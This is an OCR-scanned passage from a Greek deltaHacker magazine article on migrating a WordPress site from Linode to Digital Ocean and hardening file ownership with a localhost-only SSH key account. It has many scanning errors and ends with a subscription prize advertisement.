καθορισμένο document root του web server: Πρόκειται για τον κατάλογο από τον 
οποίο σερβίρει περιεχόµενο ο nginx και για την εγκατάστασή µας είναι ο /usr/share/ 
nginx/html. H µεταφορά γίνεται εξαιρετικά απλά: 


-/tmp$ sudo mv * /usr/share/nginx/html 

Meragatvoupe στον κατάλογο /usr/share/nginx/html 
-/tmp$ cd /usr/share/nginx/html 

κι αλλάζουμε την ιδιοκτησία kat ra δικαιώµατα όλων των αρχείων και καταλόγων: 
/usr/share/nginx/html$ sudo chown -R www-data:www-data * 


H κίνηση αυτή δεν είναι βέλτιστη από πλευράς ασφαλείας και δεν σας την προτεί- 
νουµε. Αφήνουμε όµως “προσωρινά” όλα ra αρχεία και τους καταλόγους στον χρή- 
στη www-data kat στην ομώνυμη ομάδα, ώστε, αν χρειαστεί, να είναι εύκολο ν΄ avad- 
βαθµίσουµε plugins και themes. Στο τελευταίο µέρος του παρόντος άρθρου, αφού 
έχουμε βεβαιωθεί ότι ro deltahacker.gr σερβίρεται κανονικά από τον νέο host, θα 
κάνουμε όλες τις απαραίτητες ενέργειες προκειμένου να ενισχύσουμε την ασφά- 
λεια του site. 
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Προς το παρόν, ανοίγουµε το αρχείο wp-config.php προς διόρθωση, T.X., µε χρήση 
του nano: 


/usr/share/nginx/html$ sudo nano wp-config.php 
Εστιάζουμε την προσοχή µας στις ακόλουθες γραμμές: 


define('DB NAME', 'deltahacker_db'); 
define('DB USER', 'deltahacker user'); 
define( 'DB PASSWORD', 'aint no real password'); 


Ίσως χρειαστεί να κάνουμε αλλαγές, WOTE στις μεταβλητές DB. NAME, DB. USER 
και DB. PASSWORD va αντιστοιχίζονται το όνομα της βάσης, το όνομα του χρήστη 
της κι ο κωδικός του αντίστοιχα - ακριβώς όπως ra ορίσαµε πριν λίγο. Αποθηκεύ- 
ουµε τις αλλαγές oro wp-config.php κι εγκαταλείπουµε rov editor (oro nano, TUX., 
δίνουμε [CTRL+0], [Enter] και µετά [CTRL4X]). 


Ενημέρωση web server 


Το αρχείο ρυθμίσεων που χρησιμοποιεί o nginx προκειµένου να σερβίρει περιεχό- 
µενο από το /usr/share/nginx/html, είναι ro /etc/nginx/sites-available/default. Προτεί- 
νεται να TO μετονομάσουμε και µετά να φτιάξουμε éva νέο αρχείο µε το ίδιο όνοµα 
(default), το οποίο θα ἐχειτις κατάλληλες οδηγίες για ro site µας: 


/usr/share/nginx/html$ cd /etc/nginx/sites-available 
/etc/nginx/sites-available$ sudo mv default default.orig 


Εδώ είναι καλή ιδέα va μεταφέρουμε, σ αυτήν ακριβώς τη θέση, το αντίστοιχο ap- 
χείο "default" που υπάρχει στο παλιό VPS --και να φροντίσουμε ώστε πράγματι να 
ονομάζεται default. Κατά πάσα πιθανότητα, η µόνη επέμβαση που θα κάνουµε θα 
αφορά στη διαδρομή του καταλόγου από τον οποίο ο nginx σερβίρει ro περιεχόµενο. 
Δείτε, π.χ. τα περιεχόμενα το δικού µας default (στον νέο host): 


server í 
listen 80 default_server; 
listen [::]:80 default_server ipv6only=on; 


root /usr/share/nginx/html; 
index index.php index.html index.htm; 


server_name deltahacker.gr; 
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location / í 
try files turi $uri/ /index.php?q-$uri&$args; 
} 


error_page 404 /404.html; 
error_page 500 502 503 504 /50x.html; 
location = /50x.html í 
root /usr/share/nginx/html; 
} 


location ~ \.php$ í 
try files $uri -404; 
fastcgi split path info ^(.*V.php)(/.*)$; 
fastcgi pass unix:/var/run/php5-fpm. sock; 
fastcgi index index.php; 
include fastcgi params; 


} 


Προκειμένου να ληφθούν υπόψη οι αλλαγές, επανεκκινούµε τον nginx αλλά και την 
php5-fpm: 


/etc/nginx/sites-available$ sudo service nginx restart 

* Restarting nginx nginx 

/etc/nginx/sites-available$ sudo service php5-fpm restart 
php5-fpm stop/waiting 

php5-fpm start/running, process 2233 


Έλεγχοι και αλλαγές DNS στον registrar 


Πα va βεβαιωθούμε ότι όλα εἶναι εντάξει µε ro site µας στον véo host «χωρίς: όμως 
να πειράξουµε τις ρυθμίσεις DNS στον registrar, µια ιδέα είναι να προσθέσουμε ένα 
κατάλληλο entry στο αρχείο hosts του υπολογιστή από τον οποίο εργαζόµαστε. 
To εν λόγω αρχείο στα Unix-like συστήµατα (Linux, OS X, *BSD κ.ά.) εἶναι κάτω από 
τον κατάλογο /etc, ενώ στα Windows βρίσκεται µέσα στον φάκελο %systemroot%N 
system32\drivers\etc, όπου το %systemroot% ταυτίζεται σχεδόν πάντα µε το ΟΛ 
windows. Για την τροποποίηση rou hosts χρειαζόμαστε δικαιώµατα διαχειριστή και 
η γραµµή που προσθέτουμε πρέπει να έχει τη µορφή 


54 


Μετακόµιση site σε νέο host ἃ ενίσχυση της ασφάλειας 


διεύθυνση IP του νέου ΝΡ5 deltahacker.gr deltahacker 


Δείτε στο screenshot που ακολουθεί τη γραμμή που προσθέσαµε στο hosts ενός 
συστήµατος µε openSUSE. 


delta@osusevmg:~ 
File Edit View Search Terminal Help 
GNU nano 2.3.6 File: /etc/hosts Modified 


This file describes a number of hostname- to-address 
mappings for the TCP/IP subsystem. It is mostly 
used at boot time, when no name servers are running 
On small systems, this file can be used instead of a 
"named" name server. 


Full-Qualified-Hostname Short-Hostname 


localhost.localdomain ^ localhost 
deltahacker.gr deltahacker 


# special IPv6 addresses 
ΗΒ localhost ipv6-localhost ipv6-loopback 


ipv6-localnet 
ipv6-mcastprefix 
ipv6-allnodes 


ipv6-allrouters 
ipv6-allhosts 


s Eu beu Boz ενα PESCE ασ entes 

Το αρχείο hosts To συμβουλεύονται λειτουργικό σύστημα κι εφαρμογές πριν 
ακόµη ρωτήσουν κάποιον nameserver για την αριθµητική διεύθυνση ενός 
domain. Έτσι, µε την προσθήκη που έχουµε κάνει oro /etc/hosts του συγκεκρι- 
μένου υπολογιστή µε openSUSE, εἰμαστε σε θέση να ελέγξουμε αν όλα έχουν 
πάει καλά µε τη µεταφορά του site στον νέο provider (Digital Ocean) πριν ακόμα 
δώσουμε στον registrar τους νέους nameservers για το domain. Καθώς εμείς KÅ- 
νουµετους ελέγχους µας οι επισκέπτες του deltahacker.gr εξυπηρετούνται από 
το παλιό VPS, αφού στον registrar είναι δηλωμένοι οι nameservers του παλιού 
provider (Linode). 


deltaHacker > We're moving to a new host... — Mozilla Firefox x 
deltaHacker > We're mov... X | 45 
€ @ deltahacker.gr v elo wë ο + é 4 lb oz 
deltaHacker 


Μετακομίζουμε 


To deltaHacker μετακομίζει στον VPS provider που βρίσκονται και οι άλλοι servers mc Parabing Creations. 
Απολογίες για την όποια αναστάτωση, αλλά σύντομα όλα θα είναι Όπως Πρέπει (TM). 


Ευχαριστούμε για την κατανόηση -- και τα λέμε ξανά σύντομα! 


Maintenance Mode plugin by Software Guide. Login 


Κατά την πρὠτη µας επίσκεψη oro deltahacker.gr στον νέο host (Digital Ocean), 
θυμόμαστε ότιτο backup από rov παλιό host (Linode) ελήφθη όταν ro Maintenance 
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Mode plugin ήταν ήδη ενεργοποιημένο. Με κλικ στο Login κάτω δεξιά μπορούμε 
να συνδεθούµε oro site µε τα στοιχεία κάποιου διαχειριστή και, µε την προῦπό- 
θεση ότι η µεταφορά έχει γίνει χωρίς λάθη, θα βλέπουμε τις σελίδες του KAVO- 
νικά. Προσοχή: Κάπου εδώ οφείλουμε va απενεργοποιήσουµε ro Maintenance 
Mode plugin (στον νέο host, όχι στον παλιό). 


< ὢ Papaki Ltd (GR) https 


jJ £ Papaki.gr x + 


Papaki.gr - Mozilla Firefox 


WE Πακέτα website Builder 


D Πακέτα Mobile Website 


pe 
ee) Πακέτα Marketing Tool 
x a 


a Πακέτα SiteLock 
ví Pre-Registrations 


EH Όλες οι Υπηρεσίες 


[Ü προσοορες 


Κουπόνι έκπτωσης 1096 στο 


'//νννν ^. papaki.gr/« p2/manageDomain.aspx?dc 


wa 9 s ñ 4 D e 


Το domain κατοχυρώθηκε στις 31 Μαϊ 2011 και λήγει σε 684 ηµέρες 


ἂν Nameservers: {Επεζεργασία!. 


ns1.digitalocean.com 
ns2 digitalocean.com 
ns3.digitalocean.com 


12] Domain Forward ®©: 
Ανενεργό (Ενεργοποίηση). 


ών Κωδικός Εξουσιοδότησης ©: 


Αποστολή µέσω email 


ῳ Φάκελοι ©: (Επεζερνασία). 


To ὄνομα χώρου δεν υπάρχει σε 
κάποιο φάκελο 


ών Control Panel Lite: 


Ανενεργό (Ενεργοποίηση). 
Δώστε πρόσβαση σε τρίτους, yia 
TO συγκεκριµένο όνοµα χώρου. 


) Αυτόματη Ανανέωση (0: 
Ενεργό (Επεξεργασία) 


Domain Security Pin ©: 


πακέτο Web Hosting Pro. Μάθετε 
Περισσότερα... 


A à οἱ πι 


Αλλαγή κωδικού εξουσιοδότησης 
Κατάσταση: Ενεργό 


| "™ Σελίδα Υπο Κατασκευή ή Προς Πώληση 9: 


Ημερομηνία Λήξης: 01/03/2017 Ανενεργό (Ενεργοποίηση) 


Ανανέωση. 
e Πώληση Domain ©: 
Ανενεργό (Ενεργοποίηση) 


ù Υπηρεσία DNS ©: (Ενεργοποίηση) 


Αφού κάνουμε τους ελέγχους µας και βεβαιωθούμε ότι TO site λειτουργεί KL αντι- 
ὃρά όπως πρέπει, εἶναι wpa να αφαιρέσουμε από ro hosts file τη γραμμή µε τη 
δημόσια ΙΡ για ro deltahacker.gr kat να ενημερώσουμε τον registrar για τους νέους 
DNS servers (της Digital Ocean) που εξυπηρετούν το site µας. 


Οιπληροφορίεςγιατις αλλαγές των nameservers χρειάζονται κάποιο χρόνο προ- 
κειμένου να διαδοθούν στο παγκόσμιο σύστημα DNS. Αρχικά -και µε την προῦ- 
πόθεση ότι δεν γίνεται κάποιο τοπικό resolving, T.X., µε βάση πληροφορίες στο 
hosts file—, όλοι όσοι επισκέπτονται το deltahacker.gr θα καταλήγουν στο site στον 
παλιό host (Linode) και θα βλέπουν το μήνυμα του Maintenance Mode plugin. Μετά 
από κάποιο χρόνο, ο οποίος στην καλύτερη περίπτωση θα εἰναι γύρω στη μισή 
ώρα, οι επισκέπτες του Site θα κατευθύνονται στον νέο host και βεβαίως δεν θα 
βλέπουν το μήνυμα του Maintenance Mode plugin. Κατάτους ελέγχους µας από το 
https://cachecheck.opendns.com διαπιστώσαμε ότι χρειάστηκαν περισσότερες 
από τρείς ώρες προκειµένου να ενημερωθούν γιατις αλλαγές οι ανά τον πλανή- 
Tn nameservers που επιβλέπει το εργαλείο CacheCheck, της OpenDNS. Επίσης, οι 
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nameservers του ISP που χρησιμοποιούσαμε τις εβδομάδες όπου έγινε η µετα- 
φορά, χρειάστηκαν περίπου 24 ώρες για va ενημερωθούν. Σε κάθε περίπτωση, 
μετά απὀ 48 ὠρες πρακτικά όλοι οι επισκέπτες rou site θα εξυπηρετούνται από 
τους nameservers της Digital Ocean. Και τότε, είναι ασφαλές να κατεβάσουμε 
(shutdown) ro VPS rou site στον παλιό host. Προτείνεται να κρατήσουμε ro αντί- 
στοιχο image για μερικές μέρες ακόµα, αφού Ποτέ Δεν Ξέρεις (TM). 


CacheCheck | OpenDNS: Cloud-Delivered Security Enforcement and Intelligence — Mozilla Firefox x 
[I] CacheCheck | OpenD... x | + 


€ v.a opendns.com vella AO 4 4 ez 


ÜpenDNS CacheCheck 


OpenDNS has huge caches, which is one reason OpenDNS makes your Internet experience faster. With CacheCheck, 
you can check what OpenDNS customers see when they request a domain. If there's something amiss, you may 


refresh OpenDNS's cache for that domain 


Enter a domain name to check: 


Results for deltahacker.gr 
North America 
Ashburn, Virginia, United States Chicago, Illinois, United States Dallas, Texas, United States 
188.226.190.206 188.226.190.206 188.226.190.206 
Los Angeles, California, United States Miami, Florida, United States New York, New York, United States 
188.226.190.206 188.226.190.206 188.226.190.206 
Palo Alto, California, United States Seattle, Washington, United States Toronto, Ontario, Canada 
188.226.190.206 188.226.190.206 188.226.190.206 
Vancouver, British Columbia, Canada 
188.226.190.206 
Europe 


Amsterdam, Netherlands 
188.226.190. 


Paris, France 
188.226.190.206 
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Όταν µεταφέραμε τα αρχεία rou backup στον κατάλογο /usr/share/nginx/html, apé- 
σως φροντίσαμε ώστε ο χρήστης www-data να είναι ο ιδιοκτήτης των αρχείων και 
των καταλόγων TOU Site. Ακριβώς ra ἰδια αρχεία και καταλόγους ra αντιστοιχίσαµε 
στην ομάδα www-data. O web server µας, o nginx, τρέχει επίσης υπό το λογαριασμό 
του www-data. Αυτό σηµαίνει ότι οι αναβαθμίσεις της core engine του WordPress, Ka- 
θὼς και των plugins και των themes, γίνονται πανεύκολα, είτε αυτόματα είτε µέσα 
από ro control panel του WordPress, χωρίς φασαριόζικα μηνύματα και φασαρίες. To 
ίδιο ισχύει και γιατις εγκαταστάσεις ή τις διαγραφές plugins και themes. 


Πα λόγους ασφαλείας, όµως, όλα ra αρχεία και οι κατάλογοι του site προτείνεται να 
ανήκουν σε έναν άλλον, απλό χρήστη -- όχι σ αυτόν από το λογαριασμό του οποίου 
τρέχει o web server. Ανάλογες παρατηρήσεις ισχύουν και για την ομάδα (group) των 
αρχείων. Σε éva τέτοιο σενάριο, προκειμένου να είναι δυνατές οι εγκαταστάσεις, 
οι αναβαθμίσεις, οι διαγραφές και οι ενημερώσεις μέσα” από ro control panel του 
WordPress, ο χρήστης rou nginx θα πρέπει να συνδέεται στο λογαριασμό του ιδι- 
οκτήτη των αρχείων και των καταλόγων του site. Εξ ορισμού, το WordPress µάς 
παροτρύνει να συνδεόµαστε µέσω ΕΤΡ.Αλλάτο εν λόγω πρωτόκολλο εἶναι εξαιρε- 
τικά επισφαλές, οπότε θα φροντίσουμε η σύνδεση να γίνεται µέσω SSH και μάλιστα 
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µε χρήση κλειδιών (passwordless). Επίσης, θα περιορίσουμε τις συνδέσεις SSH στο 
λογαριασμό του ιδιοκτήτη TOU site WOTE να επιτρέπονται µόνο τοπικά, δηλαδή από 
τον localhost. 


Αναλυτικότερα, στο υπόλοιπο του άρθρου φροντίζουμε για τα ακόλουθα: 


δημιουργία νέου λογαριασμού χρήστη (εμείς θα τον ovouáooupe isafjordur) 


ανάθεση όλων των αρχείων και των καταλόγων του Site στο νέο χρήστη και 
στην ομάδα του νέου χρήστη 


δημιουργία ζεύγους κλειδιών, WOTE ο χρήστης www-data να µπορεί να συνδέ- 
εται (passwordless) στο account του isafjordur 


διευθέτηση ιδιοκτησίας κλειδιών και ενέργειες ώστε o www-data να «εἰναι 
σε θέση να συνδέεται στο account του isafjordur 


διασφάλιση ότι στο λογαριασμό rou isafjordur θα επιτρέπονται συνδέσεις SSH 
*uóvov* απὀ rov localhost 


επέμβαση στο wp-config.php (ώστε va µη χρειάζεται να πληκτρολογούμε τα 
στοιχεία σύνδεσης στο λογαριασμό του isafjordur 


δοκιμές και μεμονωμένες αλλαγές στο ιδιοκτησιακό καθεστώς, ώστε να δι- 
ευκολυνόμαστε στη διαχείριση του WordPress site 


Χωρίς άλλες περιστροφές, ξεκινάμε την εργασία µας µε σύνδεση στο λογαριασμό 
του χρήστη admin και ρίχνοντας µια ματιά στα περιεχόμενα του καταλόγου /usr/ 
share/nginx/html. 
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File Edit View Search Terminal Help 


$ 
$ 15 -lh /usr/share/nginx/html/ 
total 244K 
Γ 537 Mar 4 2014 50x.html 
15 14:43 backwpup_readme. txt 
2014 index.html 
2013 index.php 
07:43 license.txt 
14:43 manifest.json 
2014 nginx.conf 
06:11 readme.html 


-activate.php 


-atom.php 
wp-blog-header .php 
-comments-post.php 
-commentsrss2.php 
-config.php 
-config-sample.php 


rwxr-x 15 w 


-cron.php 

W-r--r-- www-data www- a wp- feed.php 

drwxrwxr-x 12 w : 

-rw-r--r-- wp-links-opml.php 
-load.php 

Wp-login.php 


p- 
-settings.php 
21 2014 wp-signup.php 
2014 wp- trackback.php 
2 2014 xmlrpc.php 


-data 4.0K Dec 
-data www-data 3.0K May 


Μετακόµιση site σε νέο host ἃ ενίσχυση της ασφάλειας 


Αν ακολουθήσατε τις οδηγίες µας έως τώρα, τότε όλα τα αρχεία και οι κατάλογοι 
του WordPress site θα ανήκουν στο χρήστη και στην ομάδα www-data. O nginx 
τρέχει από τον λογαριασμό του www-data, επομένως οι αναβαθμίσεις της core 
engine γίνονται αυτόματα και πανεύκολα από το ἰδιο WordPress. To ίδιο εύκολα 
προσθέτουμε, αφαιρούμε κι αναβαθµίζουµε plugins και themes, πάντα μέσα από 
TO control panel του WordPress. Το θέμα είναι ότι, γιαλόγους ασφαλείας, τα αρχεία 
και OL κατάλογοι TOU Site προτείνεται v' ανήκουν σε άλλον χρήστη και σε άλλη 
ομάδα. 


Δημιουργούμε ένα νέο λογαριασμό χρήστη, µε όνομα isafjordur. Ταυτόχρονα θα ðn- 
µιουργηθεί και µια νέα, ομώνυμη ομάδα. Δεν 8a αντιστοιχίσουµε password στον 
χρήστη isafjordur. Το εργαλείο που θα χρησιμοποιήσουμε για τη δηµιουργία του, το 
adduser, θα µας ρωτήσει τρεις φορές για véo password και επαναπληκτρολόγησή 
TOU. Στις ερωτήσεις αυτές πατάμε, απλά, ro [Enter] 


$ sudo adduser isafjordur 
[sudo] password for admin: 
Adding user 'isafjordur' ... 
Adding new group 'isafjordur' (1001) ... 
Adding new user 'isafjordur' (1001) with group "isafjordur' ... 
Creating home directory "/home/isafjordur' ... 
Copying files from "/etc/skel' ... 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied 
Enter new UNIX password: 
Retype new UNIX password: 
No password supplied 
passwd: Authentication token manipulation error 
passwd: password unchanged 
Try again? [y/N] n 
Changing the user information for isafjordur 
Enter the new value, or press ENTER for the default 
Full Name []: Ísafjörður 
Room Number []: 
Work Phone []: 
Home Phone []: 
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Other []: 
chfn: name with non-ASCII characters: 'Ísafjóróur' 
Is the information correct? [Y/n] y 
$ 


Μπορεί va un δώσαμε password στον isafjordur, χάρη όμως στις ρυθμίσεις oro /etc/ 
ssh/sshd. config κανείς δεν µπορεί να συνδεθεί απομακρυσμένα o' αυτόν το λογα- 
ριασµό (επιτρέπονται μόνο τα SSH logins µε χρήση κλειδιών). Μεταβαίνουμε τώρα 
στον κατάλογο /usr/share/nginx/html... 


$ cd /usr/share/nginx/html 


.κι αλλάζουμε τον χρήστη και την ομάδα όλων των αρχείων και καταλόγων από 
εκεί και κάτω, σε Isafjordur: 


/usr/share/nginx/html$ sudo chown -R isafjordur:isafjordur * 


Update Plugins < deltaHacker — WordPress -- Mozilla Firefox x | 
| | ΚΙ Update Plugins « dett... X | + 
| € ) @ deltahacker.gr/wp-admin/update-core.php?action=do-plugin-upgrade Ev e| [à search !π 89 4 4 4 e = 
ᾷ 4 detaHacker O5 P Ἐν wangGuard ($ Membership Admin Howdy, subZraw * 


Help 
@ Dashboard 
You are logged in as a Membership Admin user, you will therefore see all protected content on this site. 


Update Plugins 


Connection Information 


To perform the requested action, WordPress needs to access your web server. Please enter your FTP or SSH credentials to proceed. If you do not remember 
your credentials, you should contact your web host. 


Hostname 
Example w. wordprill 
FTP/SSH Username 


FTP/SSH Password 
@ 


This password will not be stored on the server. 
Authentication Keys 


Public Key: 


Private Key: 


Enter the location on the server where the public and private keys are located. If a passphrase is needed, enter that in the password field above. 
Connection Type 
FTP D) FTPS (SSL) L) SSH2 


Proceed 
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Αν σ αυτό το σηµείο επιχειρήσουµε να αναβαθµίσουµε ένα plugin, το WordPress 
δεν θα μπορέσει να προχωρήσει και θα µας ζητήσει να συνδεθούμε, µε κάποιον 
τρόπο, στο λογαριασμό του ιδιοκτήτη των αρχείων και των καταλόγων TOU Site. 
Παρατηρήστε ότι αν "δεν" είχαμε φροντίσει va εγκαταστήσουμε ra πακέτα php5- 
gd και libssh2-php (το κάναμε προηγουμένως, όταν ετοιμάζαμε τον νέο host), η 
επιλογή για σύνδεση SSH *õev* θα ήταν διαθέσιμη. 


Μεταβαίνουµε τώρα στο λογαριασμό rou isafjordur πληκτρολογώντας 


/usr/share/nginx/html$ sudo su - isafjordur 


και χωρίς καμία καθυστέρηση παράγουµε ένα ζεύγος κλειδιών RSA μήκους 4096 p" - 
bits (o' αυτή την περίπτωση, λίγη παράνοια δεν βλάπτει) 


$ ssh-keygen -b 4096 
Generating public/private rsa key pair. 


Enter file in which to save the key (/home/isafjordur/.ssh/id_rsa): /home/ 
isafjordur/rsa key 


Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in /home/isafjordur/rsa key. 

Your public key has been saved in /home/isafjordur/rsa key.pub. 

The key fingerprint is: 

0a:39:74:e0:8c:38:9f:5d:a2:e6:1d:3f:c3:ef:26:18 isafjordurGdeltahacker.gr 
The key's randomart image is: 

*--[ RSA 4096]----* 


| 
| 
| 
| 
κ ὑπο; | 
| 
| 
| 
| 
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Παρατηρήστε ότι: 


* Ερωτηθήκαμε για την τοποθεσία της δημιουργίας ιδιωτικού και δηµοσί- 
ου κλειδιού και πληκτρολογήσαμε /home/isafjordur/rsa_key. Έτσι, oro home 
directory του isafjordur θα δημιουργηθούν τα αρχεία rsa_key (ιδιωτικό κλειδί) 
και rsa_key.pub (δημόσιο κλειδί). 


* Δεν ορίσαµε passphrase για την προστασία του ιδιωτικού κλειδιού. 
* Μετά τη δηµιουργία του ζεύγους κλειδιών βγήκαμε από το λογαριασμό του 
isafjordur. 


Τα κλειδιά rsa. key και rsa. key.pub ra έχουμε φτιάξει για τον www-data, επομένως 
οφείλουμε να βεβαιωθούμε ότι µπορεί va ra διαβάζει: 


/usr/share/nginx/html$ sudo chown isafjordur:www-data /home/isafjordur/rsa_key* 
/usr/share/nginx/html$ sudo chmod 0640 /home/isafjordur/rsa key* 


Ωραία. Ma va µπορεί οχρήστης www-data να συνδέεται στολογαριασμότου isafjordur 
µε χρήση rou δημοσίου κλειδιού (rsa_key.pub), κατά πρώτον πρέπει να υπάρχει o 
κατάλογος /home/isafjordur/.ssh και κατά δεύτερον το αρχείο /home/isafjordur/. 
ssh/authorized. keys, µέσα στο οποίο 0a παρατίθεται το περιεχόµενο του αρχείου 
rsa_key.pub. Επίσης, φροντίδα χρειάζονται το ιδιοκτησιακό καθεστώς και τα ὄικαι- 
cara πρόσβασης rou καταλόγου .ssh και του αρχείου authorized. keys. Δείτε: 


/usr/share/nginx/html$ sudo mkdir /home/isafjordur/.ssh 
/usr/share/nginx/html$ sudo chown isafjordur:isafjordur /home/isafjordur/.ssh 
/usr/share/nginx/html$ sudo chmod 0700 /home/isafjordur/.ssh 


/usr/share/nginx/html$ sudo cp /home/isafjordur/rsa key.pub /home/isafjordur/. 
ssh/authorized keys 


/usr/share/nginx/html$ sudo chown isafjordur:isafjordur /home/isafjordur/.ssh/ 
authorized keys 


/usr/share/nginx/html$ sudo chmod 0644 /home/isafjordur/.ssh/authorized keys 


Οι SSH συνδέσεις στο λογαριασμό του isafjordur θέλουμε va επιτρέπονται μόνο από 
το localhost. Ακριβώς γι αυτό ανοίγουμε το αρχείο /home/isafjordur/.ssh/authorized.. 
keys µε τον αγαπημένο µας text editor και στην αρχή του πληκτρολογούμε 


from="127.0.0.1" 


ακολουθούμενο από éva κενό. Δείτε, π.χ., πώς μοιάζει το δικό µας /home/isafjordur/. 
ssh/authorized_keys: 
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/usr/share/nginx/html$ sudo cat /home/isafjordur/.ssh/authorized keys 


fromz"127.0.0.1" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCtVs * J02y 7s YvPZ 
LOJVrztakStSMvLYEutExHHYMnIG7XJ7zpG4wzD2e/07jYcVJZLHNOot *Rqkb /6BK62V 
snkp1z7CkWZRj 3MqFAQeN11IYY2TyI-*VBCSal9bbh3glbix3PnCmgPwC27Z9LRKf6Ah2y 
10JHOGXRZcoLcpOyqFVUvt JCk5CJHmiZkp5n3cnzzQE2CFIC/MR/5aMuORWozXrC4 
7QE5qa5k1SxC80dATgmtWOBEQ8DxgLr jXP j EOef JU1C9n5 69pxumlhz5ypDBFz /wHwhr 
dgb8B*djUj zwJNT1ZMg;jvCh5Bp4IL9b0e / nMQVJpdmAoQTbRj d5mOEdpmy / qzhLGDp-* 
JzMOueiCUTYADOAlmQYmt82dIXRKfeH1xfyDt21FOrXi9neKhIDhi;jYLHkcO3fta2UIVmA 
*Q4pYixVFz9SjOzsbt5H5SsWHe/VMRzYTvIrOb/40G* /8DY-*Am; / 7EUvy7* I* YnP / SEWj y 
DLVcvhbtC9ED*TaNjvjcZGeY36ZN2JjZAcLinlECghVay6lo*X7V1qfnlpFtczfHzUPkZnr4 
lsbdDFLwKWbioNwWGIQBXe3dINxetPYX1UZf26hlPxVx9bcAbOfbotSmhdhKNkY-1Sp7Z 
OVYZCUHb2*UBYL JxY1z j FD1210ehTYv4FwcPED8TupfyHPaeJgZSBw-- isafjordurQ 
deltahacker.gr 


Ανοίγουμε στη συνέχεια το αρχείο wp-config.php, από τον κατάλογο /usr/share/ 
nginx/html: 


/usr/share/nginx/html$ sudo nano wp-config.php 
Στο τέλος TOU προσθέτουμε τις ακόλουθες γραμμές 


define( ' FTP. PUBKEY' , '/home/isafjordur/rsa_key.pub'); 
define( ' FTP. PRIKEY' , ' /home/isafjordur/rsa key'); 
define( ' FTP. USER', 'isafjordur'); 
define( 'FTP. PASS' ,''); 

define( 'FTP. HOST','127.0.0.1:49250'); 


Προφανώς, στη δική σας περίπτωση οι παράμετροι ΕΤΡ PUBKEY, ΕΤΡ PRIKEY και 
FTP USER θα δεχθούν διαφορετικές τιμές. Επίσης, ro port στη τιμή της ΕΤΡ HOST 
δεν θα είναι το 49250 αλλά αυτό που έχετε ορίσει για την υπηρεσία rou OpenSSH. 


Μετά κι art αυτό, ας επανεκκινήσουµε τον nginx: 


/usr/share/nginx/html$ sudo service nginx restart 
* Restarting nginx nginx [ OK ] 


Επιχειρώντας va αναβαθµίσουµε ñ va εγκαταστήσουµε κάποιο plugin ñ theme, στη 
σχετική σελίδα του WordPress 8a παρατηρήσουμε ότι είναι ήδη συμπληρωμένα όλα 
τα απαραίτητα στοιχεία για τη σύνδεση στο λογαριασμό rou isafjordur. Αρκεί μόνο 
να θέσουμε Connection Type = SSH2 και να κάνουμε éva κλικ στο κουμπί Proceed, 
ATÓ κάτω. 
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Update Plugins < deltaHacker — WordPress -- Mozilla Firefox 


σον. To WordPress είναι érot- 
IE ο ο ο s πη 
από τα εγκατεστημένα 
plugins και, χάρη στις 
πρ ο προσθήκες μας στο wp- 
iE EHI MA config.php, όλα ra στοι- 
χεία για τη σύνδεση στο 


You are logged In as a Membership Admin user, you will tnerefore see all protected content on this site. 


To perform the requested action, WordPress needs to access your web server: Please enter your FTP or SSH credentials to proceed. Ifyou do not remember 
your credentials, you should contact your web host. 


Hostname 


Έστε λογαριασμό του ιδιοκτή- 
mI τη TOU Site (isafjordur) si- 
bm vat ἤδη συμπληρωμένα. 
άμα Το µόνο που χρειάζεται 
= να κάνουμε -κι αυτό 
κ.α E µόνο για την πρώτη 
ο... φορά- είναι να φροντί- 
n. PN σουµε ώστε Connection 
Type Ξ SSH2. 
μμ μμ μμ μμ”. Update Plugins « deltaHacker — WordPress - Mozilla Firefox — x 

| Ta upama Pugne ciet. x V a Πα το επόμενο plugin 
PyTMECE ES μμ -- πα, Του επιχειρούµε v' ava- 
= βαθμίσουμε δεν χρειά- 
You are logged In 35 a Membership Admin user, you will therefore see all protected content on this site. ζεται να κάνουμε κάτι 

Update Plugins / 
ο πο τος. και η διαδικασία ολοκλη- 
— trei ρώνεται εντελώς αυτο- 


Updating Plugin SyntaxHighlighter Evolved (1/1) 


µατοποιηµένα - αλλά 
και µε ασφάλεια. 


SyntaxHighlighter Evolved updated successfully. Show Details 
Some of your translations need updating, Sit tight fora few more seconds while we update them as well. 
Updating translations for WordPress (e. 

Translation updated successfully. 

ll updates have been completed. 


etum to Plugins page | Return to WordPress Updates 


Πα”μεμονωμένους: καταλόγους ίσως θελήσουμε va αλλάξουμε TO group - και συγκεκρι- 
μένα va επιστρέψουµε στο www-data. Επίσης, για τους ίδιους καταλόγους θα επιτρέψου- 
με την εγγραφή για τα µέλη της ομάδας www-data. Παράδειγμα: To theme που χρησιμο- 
ποιούµε στο deltaHacker.gr υποστηρίζει τα λεγόμενα featured images. Όταν για ένα άρθρο 
θέλουμε να υπάρχει featured image, µέσα από rov editor του WordPress διαλέγουμε µια 
εικόνα (κατάλληλων διαστάσεων) για ανέβασμα. Αυτή η εικόνα πηγαίνει στον κατάλογο 
/usr/share/nginx/html/wp-content/xscape/upload. Προκειμένου το WordPress να είναι σε 
θέση v' ανεβάζει εκεί αρχεία, αλλάξαμε ro group από isafjordur σε www-data κι επιτρέ- 
aue την εγγραφή για τα µέλη της ομάδας. Πα παρόμοιους λόγους αναγκαστήκαµε va 
αλλάξουμε το group του καταλόγου /usr/share/nginx/html/wp-content/uploads -πάλι από 
isafjordur o£ www-data- κι επιτρέψαµε την εγγραφή για τα µέλη της ομάδας. 
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Αυτό To Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό ro Mac mini δεν &tvat ro βασικό μοντέλο, και κοστίζει 1249 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό To Mac mini To κληρώνουμε μεταξύ 25 αναγνωστών µε Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδρομή σας πλησιάζει στη λήξη της, αυτό To Mac mini εἶναι 
εξαιρετικά πιθανό να γίνει δικό σας. 


fia va πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας στο 
http://deltahacker.gr/pdf12order/#s2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
